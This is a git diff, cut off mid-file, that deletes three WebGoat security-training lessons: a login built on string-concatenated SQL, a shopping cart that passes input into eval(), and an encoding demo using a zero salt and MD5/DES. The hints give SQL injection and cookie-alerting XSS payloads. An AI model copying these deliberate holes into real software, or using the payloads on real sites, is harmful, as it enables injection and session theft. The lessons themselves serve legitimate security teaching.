@@ -1,252 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.sql.Connection; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; -import java.sql.SQLException; -import java.sql.Statement; -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.H2; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.P; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.DatabaseUtilities; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; -import org.owasp.webgoat.session.ParameterNotFoundException; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 - */ -public class DOS_Login extends LessonAdapter -{ - - /** - * Description of the Field - */ - protected final static String PASSWORD = "Password"; - - /** - * Description of the Field - */ - protected final static String USERNAME = "Username"; - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - String username = ""; - String password = ""; - username = s.getParser().getRawParameter(USERNAME); - password = s.getParser().getRawParameter(PASSWORD); - - // don;t allow user name from other lessons. it would be too simple. - if (username.equals("jeff") || username.equals("dave")) - { - ec.addElement(new H2("Login Failed: 'jeff' and 'dave' are not valid for this lesson")); - return (ec.addElement(makeLogin(s))); - } - - // Check if the login is valid - Connection connection = DatabaseUtilities.getConnection(s); - - String query = "SELECT * FROM user_system_data WHERE user_name = '" + username + "' and password = '" - + password + "'"; - ec.addElement(new StringElement(query)); - - try - { - Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(query); - - if ((results != null) && (results.first() == true)) - { - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); - results.last(); - - // If they get back more than one user they succeeded - if (results.getRow() >= 1) - { - // Make sure this isn't data from an sql injected query. 
- if (results.getString(2).equals(username) && results.getString(3).equals(password)) - { - String insertData1 = "INSERT INTO user_login VALUES ( '" + username + "', '" - + s.getUserName() + "' )"; - statement.executeUpdate(insertData1); - } - // check the total count of logins - query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'"; - results = statement.executeQuery(query); - results.last(); - // If they get back more than one user they succeeded - if (results.getRow() >= 3) - { - makeSuccess(s); - String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName() - + "'"; - statement.executeUpdate(deleteData1); - return (new H1("Congratulations! Lesson Completed")); - } - - ec.addElement(new H2("Login Succeeded: Total login count: " + results.getRow())); - } - } - else - { - ec.addElement(new H2("Login Failed")); - // check the total count of logins - query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'"; - results = statement.executeQuery(query); - results.last(); - ec.addElement(new H2("Successfull login count: " + results.getRow())); - - } - } catch (SQLException sqle) - { - ec.addElement(new P().addElement(sqle.getMessage())); - sqle.printStackTrace(); - } - } catch (ParameterNotFoundException pnfe) - { - /** - * Catching this exception prevents the "Error generating - * org.owasp.webgoat.lesson.DOS_Login" message from being displayed on first load. Note - * that if we are missing a parameter in the request, we do not want to continue - * processing and we simply want to display the default login page. 
- */ - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - } - - return (ec.addElement(makeLogin(s))); - } - - /** - * Gets the category attribute of the WeakAuthenticationCookie object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.DOS; - } - - /** - * Gets the hints attribute of the CookieScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Use a SQL Injection to obtain the user names. "); - hints - .add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'"); - hints.add("Try "dont_care' or '1' = '1" in the password field"); - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(90); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the CookieScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Denial of Service from Multiple Logins"); - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeLogin(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - // add the login fields - Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR row1 = new TR(); - TR row2 = new TR(); - row1.addElement(new TD(new StringElement("User Name: "))); - row2.addElement(new TD(new StringElement("Password: "))); - - Input input1 = new Input(Input.TEXT, USERNAME, ""); - Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); - row1.addElement(new TD(input1)); - row2.addElement(new TD(input2)); - t.addElement(row1); - t.addElement(row2); - - Element b = ECSFactory.makeButton("Login"); - t.addElement(new TR(new 
TD(b))); - ec.addElement(t); - - return (ec); - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/DangerousEval.java b/src/main/java/org/owasp/webgoat/lessons/DangerousEval.java deleted file mode 100644 index 707e00e53..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/DangerousEval.java +++ /dev/null 
@@ -1,282 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import java.util.regex.Pattern; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.html.A; -import org.apache.ecs.html.BR; -import org.apache.ecs.html.Center; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.HR; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TH; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Eric Sheridan, Aspect Security - * @created October 28, 2003 - */ - -public class DangerousEval extends LessonAdapter -{ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - public final static String PASSED = "__DANGEROUS_EVAL_PASS"; - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String regex1 = "^[0-9]{3}$";// any three digits - Pattern pattern1 = Pattern.compile(regex1); - - try - { - checkSuccess(s); - - String param1 = s.getParser().getRawParameter("field1", "111"); - // String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 - // 0002 1999")); - float quantity = 1.0f; - float total = 0.0f; - float runningTotal = 0.0f; - - // FIXME: encode output of field2, then s.setMessage( field2 ); - ec.addElement(""); - // - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%")); - tr.addElement(new TH().addElement("Price").setWidth("10%")); - tr.addElement(new TH().addElement("Quantity").setWidth("3%")); - tr.addElement(new TH().addElement("Total").setWidth("7%")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); - tr.addElement(new TD().addElement("69.99").setAlign("right")); - tr.addElement(new 
TD().addElement(new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "1"))).setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY1", 0.0f); - total = quantity * 69.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case")); - tr.addElement(new TD().addElement("27.99").setAlign("right")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "1"))).setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY2", 0.0f); - total = quantity * 27.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel� Centrino�")); - tr.addElement(new TD().addElement("1599.99").setAlign("right")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "1"))).setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY3", 0.0f); - total = quantity * 1599.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over ")); - tr.addElement(new TD().addElement("299.99").setAlign("right")); - - tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "1"))).setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY4", 0.0f); - total = quantity * 299.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - - ec.addElement(t); - - t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - ec.addElement(new BR()); - - tr = new TR(); - 
tr.addElement(new TD().addElement("The total charged to your credit card:")); - tr.addElement(new TD().addElement("$" + runningTotal)); - - Input b = new Input(); - b.setType(Input.BUTTON); - b.setValue("Update Cart"); - b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');"); - - tr.addElement(new TD().addElement(b)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement("Enter your credit card number:")); - tr.addElement(new TD() - .addElement("")); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement("Enter your three digit access code:")); - tr.addElement(new TD().addElement("")); - // tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1))); - t.addElement(tr); - - b = new Input(); - b.setType(Input.BUTTON); - b.setValue("Purchase"); - b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');"); - - tr = new TR(); - tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right")); - t.addElement(tr); - - ec.addElement(t); - ec.addElement(new BR()); - ec.addElement(new HR().setWidth("90%")); - - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - return (ec); - } - - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.AJAX_SECURITY; - } - - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("The lesson is similar to the standard reflected cross-site scripting lesson."); - hints.add("The access code parameter is vulnerable to a reflected cross-site scripting problem."); - hints.add("The usual <SCRIPT>alert(document.cookie);</SCRIPT> will not work in this lesson. 
Why?"); - hints.add("User-supplied data is landing in the Javascript eval() function. Your attack will not require the < and > characters."); - hints.add("In order to pass this lesson, you must 'alert' the document.cookie."); - hints.add("Try 123');alert(document.cookie);('"); - return hints; - } - - - // - /** - * Gets the instructions attribute of the WeakAccessControl object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script. In order to pass this lesson, you must 'alert()' document.cookie."; - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(120); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() - { - return "Dangerous Use of Eval"; - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } - - /** - * Check to see if JSP says they passed the lesson. - * - * @param s - */ - private void checkSuccess(WebSession s) - { - javax.servlet.http.HttpSession session = s.getRequest().getSession(); - - if (session.getAttribute(PASSED) != null) - { - makeSuccess(s); - - session.removeAttribute(PASSED); - } - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/Encoding.java b/src/main/java/org/owasp/webgoat/lessons/Encoding.java deleted file mode 100644 index 677473091..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/Encoding.java +++ /dev/null 
@@ -1,848 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.io.IOException; -import java.net.URLDecoder; -import java.net.URLEncoder; -import java.nio.ByteBuffer; -import java.nio.CharBuffer; -import java.nio.charset.Charset; -import java.nio.charset.CharsetDecoder; -import java.nio.charset.CharsetEncoder; -import java.security.MessageDigest; -import java.security.NoSuchAlgorithmException; -import java.util.ArrayList; -import java.util.List; -import javax.crypto.Cipher; -import javax.crypto.SecretKey; -import javax.crypto.SecretKeyFactory; -import javax.crypto.spec.PBEParameterSpec; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.html.A; -import org.apache.ecs.html.B; -import org.apache.ecs.html.Div; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.P; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; -import org.owasp.webgoat.util.HtmlEncoder; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. 
- * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. - * - * For details, please see http://webgoat.github.io - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 - */ - -public class Encoding extends LessonAdapter -{ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - private final static String INPUT = "input"; - - private final static String KEY = "key"; - - // local encoders - - private static sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); - - private static sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder(); - - // encryption constant - - private static byte[] salt = { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, - (byte) 0x00, (byte) 0x00 }; - - /** - * Returns the base 64 decoding of a string. 
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- * @exception IOException
- * Description of the Exception
- */
-
- public static String base64Decode(String str) throws IOException
- {
-
- byte[] b = decoder.decodeBuffer(str);
-
- return (new String(b));
- }
-
- /**
- * Description of the Method
- *
- * @param c
- * Description of the Parameter
- * @return Description of the Return Value
- * @exception IOException
- * Description of the Exception
- */
-
- public static String base64Decode(char[] c) throws IOException
- {
-
- return base64Decode(new String(c));
- }
-
- /**
- * Description of the Method
- *
- * @param c
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String base64Encode(char[] c)
- {
-
- return base64Encode(new String(c));
- }
-
- /**
- * Returns the base 64 encoding of a string.
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String base64Encode(String str)
- {
-
- byte[] b = str.getBytes();
-
- return (encoder.encode(b));
- }
-
- /**
- * Description of the Method
- *
- * @param b
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String base64Encode(byte[] b)
- {
-
- return (encoder.encode(b));
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- protected Element createContent(WebSession s)
- {
-
- ElementContainer ec = new ElementContainer();
-
- try
- {
-
- String userInput = s.getParser().getRawParameter(INPUT, "");
-
- String userKey = s.getParser().getStringParameter(KEY, "");
-
- Table table = new Table();
-
- TR tr = new TR();
-
- tr.addElement(new TD("Enter a string: "));
-
- Input input = new Input(Input.TEXT, INPUT, userInput);
-
- tr.addElement(new TD().addElement(input));
-
- table.addElement(tr);
-
- tr = new TR();
-
- 
tr.addElement(new TD("Enter a password (optional): "));
-
- Input key = new Input(Input.TEXT, KEY, userKey);
-
- tr.addElement(new TD().addElement(key));
-
- table.addElement(tr);
-
- tr = new TR();
-
- Element b = ECSFactory.makeButton("Go!");
-
- tr.addElement(new TD().setAlign("center").setColSpan(2).addElement(b));
-
- table.addElement(tr);
-
- ec.addElement(table);
-
- ec.addElement(new P());
-
- Table t = new Table();
-
- t.setWidth("100%");
-
- t.setBorder(0);
-
- t.setCellSpacing(1);
-
- t.setCellPadding(4);
-
- String description;
-
- t.addElement(makeTitleRow("Description", "Encoded", "Decoded"));
-
- description = "Base64 encoding is a simple reversable encoding used to encode bytes into ASCII characters. Useful for making bytes into a printable string, but provides no security.";
-
- // t.addElement( makeDescriptionRow( description ) );
- t.addElement(makeRow(description, base64Encode(userInput), base64Decode(userInput)));
- // t.addElement( makeSpacerRow() );
-
- description = "Entity encoding uses special sequences like &amp; for special characters. This prevents these characters from being interpreted by most interpreters.";
-
- t.addElement(makeRow(description, HtmlEncoder.encode(userInput), HtmlEncoder.decode(userInput)));
-
- description = "Password based encryption (PBE) is strong encryption with a text password. Cannot be decrypted without the password";
-
- t.addElement(makeRow(description, encryptString(userInput, userKey), decryptString(userInput, userKey)));
- description = "MD5 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes. 
For obscure cryptographic reasons, it is better to use SHA-256 if you have a choice.";
-
- t.addElement(makeRow(description, hashMD5(userInput), "Cannot reverse a hash"));
-
- description = "SHA-256 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.";
-
- t.addElement(makeRow(description, hashSHA(userInput), "N/A"));
-
- description = "Unicode encoding is...";
-
- t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
-
- description = "URL encoding is...";
-
- t.addElement(makeRow(description, urlEncode(userInput), urlDecode(userInput)));
-
- description = "Hex encoding simply encodes bytes into %xx format.";
-
- t.addElement(makeRow(description, hexEncode(userInput), hexDecode(userInput)));
-
- description = "Rot13 encoding is a way to make text unreadable, but is easily reversed and provides no security.";
-
- t.addElement(makeRow(description, rot13(userInput), rot13(userInput)));
-
- description = "XOR with password encoding is a weak encryption scheme that mixes a password into data.";
-
- t.addElement(makeRow(description, xorEncode(userInput, userKey), xorDecode(userInput, userKey)));
-
- description = "Double unicode encoding is...";
-
- t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
-
- description = "Double URL encoding is...";
-
- t.addElement(makeRow(description, urlEncode(urlEncode(userInput)), urlDecode(urlDecode(userInput))));
-
- ec.addElement(t);
-
- }
-
- catch (Exception e)
- {
-
- s.setMessage("Error generating " + this.getClass().getName());
-
- e.printStackTrace();
-
- }
-
- if (getLessonTracker(s).getNumVisits() > 3)
- {
- makeSuccess(s);
- }
-
- return (ec);
- }
-
- /**
- * Convenience method for encrypting a string.
- *
- * @param str
- * Description of the Parameter
- * @param pw
- * Description of the Parameter
- * @return String the encrypted string. 
- */ - - public static synchronized String decryptString(String str, String pw) - { - - try - { - - PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20); - - SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); - - Cipher passwordDecryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding"); - - char[] pass = pw.toCharArray(); - - SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass)); - - passwordDecryptCipher.init(Cipher.DECRYPT_MODE, k, ps); - - byte[] dec = decoder.decodeBuffer(str); - - byte[] utf8 = passwordDecryptCipher.doFinal(dec); - - return new String(utf8, "UTF-8"); - } - - catch (Exception e) - { - - return ("This is not an encrypted string"); - } - - } - - /** - * Convenience method for encrypting a string. - * - * @param str - * Description of the Parameter - * @param pw - * Description of the Parameter - * @return String the encrypted string. - * @exception SecurityException - * Description of the Exception - */ - - public static synchronized String encryptString(String str, String pw) throws SecurityException - { - - try - { - - PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20); - - SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); - - Cipher passwordEncryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding"); - - char[] pass = pw.toCharArray(); - - SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass)); - - passwordEncryptCipher.init(Cipher.ENCRYPT_MODE, k, ps); - - byte[] utf8 = str.getBytes("UTF-8"); - - byte[] enc = passwordEncryptCipher.doFinal(utf8); - - return encoder.encode(enc); - } - - catch (Exception e) - { - - return ("Encryption error"); - } - - } - - /** - * Gets the category attribute of the Encoding object - * - * @return The category value - */ - - protected Category getDefaultCategory() - { - return Category.INSECURE_STORAGE; - } - - /** - * Gets the hints attribute of the HelloScreen object - * 
- * @return The hints value
- */
-
- public List getHints(WebSession s)
- {
-
- List hints = new ArrayList();
- hints.add("Enter a string and press 'go'");
- hints.add("Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters ).");
- hints.add("Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' ).");
- return hints;
- }
-
- /**
- * Gets the instructions attribute of the Encoding object
- *
- * @return The instructions value
- */
-
- public String getInstructions(WebSession s)
- {
- return "This lesson will familiarize the user with different encoding schemes. ";
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(15);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
-
- public String getTitle()
- {
- return ("Encoding Basics");
- }
-
- /**
- * Returns the MD5 hash of a String.
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hashMD5(String str)
- {
-
- byte[] b = str.getBytes();
- MessageDigest md = null;
-
- try
- {
- md = MessageDigest.getInstance("MD5");
- md.update(b);
- } catch (NoSuchAlgorithmException e)
- {
- // it's got to be there
- e.printStackTrace();
- }
- return (base64Encode(md.digest()));
- }
-
- /**
- * Returns the SHA hash of a String. 
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hashSHA(String str)
- {
- byte[] b = str.getBytes();
- MessageDigest md = null;
- try
- {
- md = MessageDigest.getInstance("SHA-256");
- md.update(b);
- } catch (NoSuchAlgorithmException e)
- {
- // it's got to be there
- e.printStackTrace();
- }
- return (base64Encode(md.digest()));
- }
-
- /**
- * Description of the Method
- *
- * @param hexString
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hexDecode(String hexString)
- {
- try
- {
- if ((hexString.length() % 3) != 0) { return ("String not comprised of Hex digit pairs."); }
- char[] chars = new char[hexString.length()];
- char[] convChars = new char[hexString.length() / 3];
- hexString.getChars(0, hexString.length(), chars, 0);
- for (int i = 1; i < hexString.length(); i += 3)
- {
- String hexToken = new String(chars, i, 2);
- convChars[i / 3] = (char) Integer.parseInt(hexToken, 16);
- }
- return new String(convChars);
- } catch (NumberFormatException nfe)
- {
- return ("String not comprised of Hex digits");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param asciiString
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hexEncode(String asciiString)
- {
- char[] ascii = new char[asciiString.length()];
- asciiString.getChars(0, asciiString.length(), ascii, 0);
- StringBuffer hexBuff = new StringBuffer();
- for (int i = 0; i < asciiString.length(); i++)
- {
- hexBuff.append("%");
- hexBuff.append(Integer.toHexString(ascii[i]));
- }
- return hexBuff.toString().toUpperCase();
- }
-
- /**
- * The main program for the Encoding class
- *
- * @param args
- * The command line arguments
- */
-
- public static void main(String[] args)
- {
- try
- {
- String userInput = args[0];
- String userKey = args[1];
- System.out.println("Working with: " + userInput);
- 
System.out.print("Base64 encoding: ");
- System.out.println(base64Encode(userInput) + " : " + base64Decode(userInput));
- System.out.print("Entity encoding: ");
- System.out.println(HtmlEncoder.encode(userInput) + " : " + HtmlEncoder.decode(userInput));
- System.out.print("Password based encryption (PBE): ");
- System.out.println(encryptString(userInput, userKey) + " : " + decryptString(userInput, userKey));
- System.out.print("MD5 hash: ");
- System.out.println(hashMD5(userInput) + " : " + "Cannot reverse a hash");
- System.out.print("SHA-256 hash: ");
- System.out.println(hashSHA(userInput) + " : " + "Cannot reverse a hash");
- System.out.print("Unicode encoding: ");
- System.out.println("Not Implemented" + " : " + "Not Implemented");
- System.out.print("URL encoding: ");
- System.out.println(urlEncode(userInput) + " : " + urlDecode(userInput));
- System.out.print("Hex encoding: ");
- System.out.println(hexEncode(userInput) + " : " + hexDecode(userInput));
- System.out.print("Rot13 encoding: ");
- System.out.println(rot13(userInput) + " : " + rot13(userInput));
- System.out.print("XOR with password: ");
- System.out.println(xorEncode(userInput, userKey) + " : " + xorDecode(userInput, userKey));
- System.out.print("Double unicode encoding is...");
- System.out.println("Not Implemented" + " : " + "Not Implemented");
- System.out.print("Double URL encoding: ");
- System.out.println(urlEncode(urlEncode(userInput)) + " : " + urlDecode(urlDecode(userInput)));
- } catch (Exception e)
- {
- e.printStackTrace();
- }
- }
-
- /**
- * Description of the Method
- *
- * @param value1
- * Description of the Parameter
- * @param value2
- * Description of the Parameter
- * @param description
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- private TR makeRow(String description, String value1, String value2)
- {
-
- TD desc = new TD().addElement(description).setBgColor("#bbbbbb");
- TD val1 = new TD()
- .addElement(new 
Div().addElement(value1).setStyle("overflow:auto; height:60px; width:100px;"))
- .setBgColor("#dddddd");
- TD val2 = new TD()
- .addElement(new Div().addElement(value2).setStyle("overflow:auto; height:60px; width:100px;"))
- .setBgColor("#dddddd");
- TR tr = new TR();
-
- tr.addElement(desc);
- tr.addElement(val1);
- tr.addElement(val2);
-
- return tr;
- }
-
- /**
- * Description of the Method
- *
- * @param value1
- * Description of the Parameter
- * @param value2
- * Description of the Parameter
- * @param description
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- private TR makeTitleRow(String description, String value1, String value2)
- {
- TD desc = new TD().addElement(new B().addElement(description));
- TD val1 = new TD().addElement(new B().addElement(value1));
- TD val2 = new TD().addElement(new B().addElement(value2));
- desc.setAlign("center");
- val1.setAlign("center");
- val2.setAlign("center");
- TR tr = new TR();
- tr.addElement(desc);
- tr.addElement(val1);
- tr.addElement(val2);
- return (tr);
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized String rot13(String input)
- {
- StringBuffer output = new StringBuffer();
- if (input != null)
- {
- for (int i = 0; i < input.length(); i++)
- {
- char inChar = input.charAt(i);
- if ((inChar >= 'A') & (inChar <= 'Z'))
- {
- inChar += 13;
- if (inChar > 'Z')
- {
- inChar -= 26;
- }
- }
- if ((inChar >= 'a') & (inChar <= 'z'))
- {
- inChar += 13;
- if (inChar > 'z')
- {
- inChar -= 26;
- }
- }
- output.append(inChar);
- }
- }
- return output.toString();
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String unicodeDecode(String str)
- {
- // FIXME: TOTALLY EXPERIMENTAL
-
- try
- {
- ByteBuffer bbuf = ByteBuffer.allocate(str.length());
- 
bbuf.put(str.getBytes());
- Charset charset = Charset.forName("ISO-8859-1");
- CharsetDecoder decoder = charset.newDecoder();
- CharBuffer cbuf = decoder.decode(bbuf);
